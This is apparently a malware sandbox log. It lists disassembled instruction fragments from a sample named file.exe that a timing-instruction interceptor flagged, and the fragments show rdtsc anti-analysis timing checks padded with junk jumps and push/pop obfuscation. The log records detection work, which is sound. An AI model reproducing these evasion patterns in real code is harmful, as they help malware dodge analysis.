Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84F93 second address: E84FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 xor cl, FFFFFFFFh 0x00000009 lea eax, dword ptr [ebp+1248383Dh] 0x0000000f jmp 00007F8854FAEB8Dh 0x00000014 mov edx, dword ptr [ebp+122D2B59h] 0x0000001a push eax 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84FBB second address: E84FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E49F5A second address: E49F6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB91h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7169 second address: EB7183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 js 00007F8854FD8856h 0x0000000d jg 00007F8854FD8856h 0x00000013 jns 00007F8854FD8856h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7461 second address: EB7465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7465 second address: EB746F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8854FD8856h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB746F second address: EB7485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F8854FAEB8Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7485 second address: EB74A9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8854FD886Ah 0x00000008 jmp 00007F8854FD885Eh 0x0000000d jc 00007F8854FD8856h 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007F8854FD8856h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB762C second address: EB763F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Eh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCB07 second address: EBCB13 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8854FD8856h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCB13 second address: EBCB19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCB19 second address: EBCB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCB1F second address: EBCB37 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8854FAEB86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 js 00007F8854FAEB86h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBCCBE second address: EBCCE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8854FD8864h 0x00000008 jmp 00007F8854FD8860h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC72C second address: EBC732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBC732 second address: EBC74D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FD8867h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBD68D second address: EBD6A6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8854FAEB88h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8854FAEB8Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBD6A6 second address: EBD6AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC5E43 second address: EC5E53 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8854FAEB92h 0x00000008 jp 00007F8854FAEB86h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC5E53 second address: EC5E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC5FD4 second address: EC5FDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC62B6 second address: EC62C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push esi 0x0000000a jp 00007F8854FD885Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC691C second address: EC6926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6A83 second address: EC6AA2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8854FD8863h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6AA2 second address: EC6AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6AA6 second address: EC6ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F8854FD8856h 0x0000000e jbe 00007F8854FD8856h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6ABA second address: EC6ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6ABE second address: EC6AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC5AA1 second address: EC5AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3E268 second address: E3E26C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCF83 second address: ECCF90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F8854FAEB86h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCF90 second address: ECCFCA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8854FD8856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F8854FD887Bh 0x00000010 popad 0x00000011 push ebx 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECC84C second address: ECC85D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECC9D1 second address: ECC9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECC9D6 second address: ECCA07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F8854FAEB86h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push edx 0x0000000f jno 00007F8854FAEB86h 0x00000015 pop edx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8854FAEB95h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCA07 second address: ECCA0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCA0B second address: ECCA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCCF1 second address: ECCCFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8854FD8856h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCCFB second address: ECCD07 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCD07 second address: ECCD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCD0B second address: ECCD0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECF3AB second address: ECF3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8854FD8856h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECF0D1 second address: ECF0D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2EDD second address: ED2F03 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8854FD886Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2F03 second address: ED2F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2F07 second address: ED2F0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2803 second address: ED2818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FAEB91h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2818 second address: ED281C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED281C second address: ED283E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FAEB90h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F8854FAEB8Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED283E second address: ED284F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FD885Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED284F second address: ED28B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jnc 00007F8854FAEB86h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 jng 00007F8854FAEB86h 0x0000001f jmp 00007F8854FAEB8Fh 0x00000024 jmp 00007F8854FAEB94h 0x00000029 popad 0x0000002a jmp 00007F8854FAEB8Eh 0x0000002f push eax 0x00000030 push edx 0x00000031 js 00007F8854FAEB86h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED28B2 second address: ED28B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2BC8 second address: ED2BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2BCE second address: ED2BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2BD2 second address: ED2BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2BDE second address: ED2C03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F8854FD8858h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F8854FD8856h 0x00000019 jno 00007F8854FD8856h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D5D9 second address: E4D5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D5DD second address: E4D5E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D5E1 second address: E4D5E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D5E7 second address: E4D60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F8854FD885Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 jmp 00007F8854FD885Ah 0x00000019 pushad 0x0000001a popad 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D60E second address: E4D612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D612 second address: E4D618 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D618 second address: E4D620 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D620 second address: E4D624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4D624 second address: E4D628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED7D62 second address: ED7D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 je 00007F8854FD8858h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jnc 00007F8854FD8856h 0x00000017 push edx 0x00000018 pop edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED81B2 second address: ED81BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED81BA second address: ED81C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED81C3 second address: ED81E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F8854FAEB91h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED81E2 second address: ED81E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED81E6 second address: ED8219 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB93h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F8854FAEB8Fh 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED84FB second address: ED851F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8854FD8856h 0x00000008 jmp 00007F8854FD8866h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED86FA second address: ED8705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED8705 second address: ED870F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8854FD8856h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDC4FC second address: EDC514 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8854FAEB8Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDC514 second address: EDC51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDC944 second address: EDC948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDE61A second address: EDE629 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F8854FD8856h 0x00000009 pop edx 0x0000000a push ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE5B4C second address: EE5B53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE5B53 second address: EE5B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edx 0x0000000a jmp 00007F8854FD885Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE5E43 second address: EE5E57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE5E57 second address: EE5E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F8854FD8856h 0x0000000a jmp 00007F8854FD8866h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE6430 second address: EE6434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE6434 second address: EE6455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8854FD8868h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8404A second address: E84052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE69C9 second address: EE69D0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE69D0 second address: EE69DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE6C33 second address: EE6C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE6C42 second address: EE6C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FAEB91h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE71F5 second address: EE7212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8869h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE7212 second address: EE7217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEC25F second address: EEC26F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 jo 00007F8854FD8856h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEC26F second address: EEC27B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEC27B second address: EEC2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FD8867h 0x00000009 jmp 00007F8854FD8864h 0x0000000e popad 0x0000000f jmp 00007F8854FD885Eh 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEFF25 second address: EEFF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8854FAEB86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEFF31 second address: EEFF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 jl 00007F8854FD887Ch 0x0000000c jmp 00007F8854FD8862h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEFF53 second address: EEFF57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF555 second address: EEF55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF55A second address: EEF55F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
